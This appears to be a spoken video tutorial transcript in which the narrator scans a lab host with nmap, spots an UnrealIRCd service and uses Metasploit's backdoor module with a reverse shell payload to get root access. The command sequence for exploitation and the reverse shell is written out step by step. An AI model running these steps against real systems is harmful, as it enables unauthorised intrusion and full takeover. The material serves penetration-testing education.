Today we're going to be diving into Metasploit, where I'll show you how to scan a target, identify the service it's running, then quickly map out any vulnerabilities that matter. Then we'll test those weaknesses to find the right exploit, and then walk you through how to use Metasploit to gain full access to the computer. This is a fast, structured workflow that you can use every time to move from scanning to discovery to exploitation without wasting any time. So back at our machine, the first thing we should do is run an nmap scan to see if the host is up at all and to check the open ports. How we do that is we type nmap followed up by the IP 192.168.56.101 followed up by minus pn, which means no ping, to basically skip the host discovery system. We run it. Okay, so when it's done here, we can see the open ports, port 21, open FTP, SSH, telnet, but we don't have really enough information. We just see the open ports and the services, which in itself, they're not vulnerabilities. To see more information, we do again nmap followed up by the IP minus no ping, and then we can run minus sv, which means show versions, to see the versions of those open ports. Okay, here we have way more information than before because we also see the versions of those services, which we can check to see if there's any known vulnerabilities. For me, the most interesting one was the open port 6667, TCP open port IRC, Unreal IRC-D, which has a known exploit. So we launch up MSF console, launching up Metasploit console. So in Metasploit, to check for any vulnerabilities, we first use the command line search, then followed up by the version or the service we want to check if it has a known vulnerability or exploit. So in this case, search followed up by Unreal IRC-D. And here we have an excellent ranked backdoor named Unreal IRC-D 3281 backdoor. Now how to use this, we first copy the name and we use the command line use. And we can see we selected it. Now we need to tell Metasploit where our target is. And we do that by typing set r host, which means set remote host. In our case is 192.168.56.101. Now we need to give Metasploit a payload, a reverse shell. We do that by using set payload cmd Unix, because the target is using Linux, /reverse. Here we have the payload set. Now we need to give Metasploit our local host to make the reverse shell. We do that by using the command line set lhost, which means local host, followed up by our IP. The way we find our IP by doing IP A. And right here, Ethernet, we have our IP right here, 192.168.56.102. We copy that, set lhost, our IP here, and then we need to give Metasploit a local port. We do it by typing set local port. We should type a unused port, and an unused one is 4444. And here we have a port set. Now we need to run this exploit, which is super simple. We just type run. And here, as you can see, the exploit already started. We just need to wait for the exploit to do its thing and finish. And as you can see, it successfully made a connection, a reverse shell to the targeted IP. First, let's check who we made the reverse shell to. We do that by typing who am I, and the server responds root. To confirm that we're root, let's check our privileges. We do that by typing sudo -l. And it says user root may run the following commands on this host, all of them. We can check the list of files, do by typing ls/la. And here we have the full list of files. We can do any changes. We can make directories, make their hacked, anything.